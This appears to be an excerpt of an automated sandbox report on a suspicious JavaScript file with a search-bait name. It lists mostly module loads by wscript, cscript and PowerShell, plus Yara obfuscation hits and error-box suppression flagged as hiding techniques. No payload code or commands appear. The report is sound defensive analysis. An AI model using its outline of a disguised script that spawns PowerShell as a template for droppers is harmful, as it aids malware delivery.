Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\cscript.exe Section loaded: version.dll
Source: C:\Windows\System32\cscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\cscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\cscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\cscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\cscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\cscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\cscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\cscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\cscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\cscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\cscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\cscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\cscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\cscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\cscript.exe Section loaded: version.dll
Source: C:\Windows\System32\cscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\cscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\cscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\cscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\cscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\cscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\cscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\cscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\cscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\cscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\cscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\cscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\cscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\cscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: samcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: samlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: is it legal to kill a peacock in california 93889.js Static file information: File size 30348243 > 1048576

Data Obfuscation

Source: Yara match File source: amsi64_6768.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_5952.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_1888.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_5796.amsi.csv, type: OTHER

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
